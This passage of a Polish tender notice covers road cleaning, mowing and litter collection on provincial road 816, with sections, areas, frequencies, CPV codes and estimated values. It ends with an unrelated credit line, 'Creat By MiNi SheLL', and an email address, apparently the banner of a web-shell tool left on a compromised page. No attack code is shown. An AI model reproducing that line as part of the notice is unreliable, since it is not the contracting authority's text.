 im. Kuraszkiewicza	- 2116 m2	jednokrotnie;       2.Oczyszczenie chodników i ścieżki pieszo-rowerowej po okresie zimowym na odcinku od ul Żołnierzy WiN 
do m. Okuninka II tj. od km 74+780 do km 82+195  - 26300 m2	jednokrotnie;
3. Oczyszczenie jezdni w okresie maj-listopad (rondo)
im. Kuraszkiewicza	2116 m2	dwukrotnie;      4.	Oczyszczenie chodników i ścieżki pieszo-rowerowej w okresie maj-listopad na odcinku od km 74+780 do km 82+195 -26300 m2	dwukrotnie;     5.	Koszenie traw i chwastów wraz ze zgrabieniem i usunięciem wykoszonej trawy i chwastów oraz zebranie i usunięcie śmieci.			
1) na odcinku od km 74+780 do km 82+195- strona lewa	-43 264 m2 trzykrotnie	2) na odcinku od km 75+390 do km 75+700 - strona prawa -	 1 240 m2	trzykrotnie	3) skrzyżowanie rondo im. Kuraszkiewicza + dojazdy	-  2 088 m2	trzykrotnie       6.	Koszenie traw i chwastów z zebraniem i usunięciem śmieci, bez zebrania i usunięcia wykoszonej trawy i chwastów 
1) na odcinku od km 74+150 do km 75+060, od km 75+150 do km 75+390 i od km 75+700 do km 77+170 - strona prawa - 38150	m2 trzykrotnie;3
7. Zbieranie śmieci z pasa drogowego na odcinku od km 74+132 do km 82+195 
- 118603 m2 35 razy (1 raz w tygodniu )
w tym:
1) od km 74+132 do km 77+132 - obustronnie,
2) od km 77+132 do km 82+195 - strona lewa	
8. Opróżnianie koszy ze śmieci wraz z wymianą worków i utrzymaniem koszy w czystości	 - 4 szt.	78 krotnie (2 razy w tygodniu)
Szacunkowa wartość zadania netto:77310,31 PLN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.30-5, 77.31.41.00-5, 77.31.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - droga wojewódzka nr 816.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres usług obejmuje:
1. Oczyszczenie jezdni po okresie zimowym na odcinku od km 59+226 do km 60+129 i od km 60+132 do km 62+440	 - 3 699 m2 jednokrotnie;
2. Oczyszczenie chodników i ścieżki pieszo-rowerowej po okresie zimowym na odcinku Suszno - Orchówek od km 59+226 do km 63+240	-11 448 m2 jednokrotnie;
3. Oczyszczenie jezdni w okresie maj-listopad odcinek  Suszno - Orchówek od km 60+132 do km 62 +440 -3 495 m2 czterokrotnie;	
4. Oczyszczenie chodników w okresie maj-listopad na odcinku od km 60+132 do km 62+440 - 6 952 m2 czterokrotnie	
5. Koszenie traw i chwastów wraz ze zgrabieniem i usunięciem wykoszonej trawy i chwastów oraz zebranie i usunięcie śmieci i liści:
1) odcinek od km 59+200 do km 59+310 - strona lewa - 150 m2 czterokrotnie;
2) odcinek od km 59+310 do km 59+606 - strona prawa -1036 m2 czterokrotnie;
3) odcinek od km 59+606 do km 60+120 - strona prawa -	1799 m2 czterokrotnie;
4) odcinek od km 59+960 do km 60+120 - strona lewa - 640 m2 czterokrotnie;
5) odcinek od km 60+130 do km 62+440 - obustronnie - 9267 m2 pięciokrotnie;
6) odcinek od km 62+440  do km 63+230 - strona lewa -3950 m2 czterokrotnie;
6. Koszenie traw i chwastów z zebraniem i usunięciem śmieci, bez zebrania i usunięcia wykoszonej trawy i chwastów 	
1) odcinek od km 59+200 do km 59+300 - strona prawa -	1 030 m2 czterokrotnie;
2) odcinek od km 59+300 do km 59+960 - strona lewa - 5 280 m2 czterokrotnie;
3) odcinek od km 62+440 do km 63+230 - strona prawa -	6 320 m2 czterokrotnie;
7.Zbieranie śmieci z pasa drogowego na odcinku Suszno - Orchówek  od km 59+200 do km 63+230 - 42 443 m2 35 krotnie (1 raz w tygodniu)
8.Opróżnianie koszy ze śmieci wraz z wymianą worków - 43 szt. 78 krotnie (2 razy w tygodniu)
1)	o pojemności 40 l - 5 szt.
2)	o pojemności 60 l - 38 szt.
Szacunkowa wartość zadania netto 43849,57 PLN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5, 77.31.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com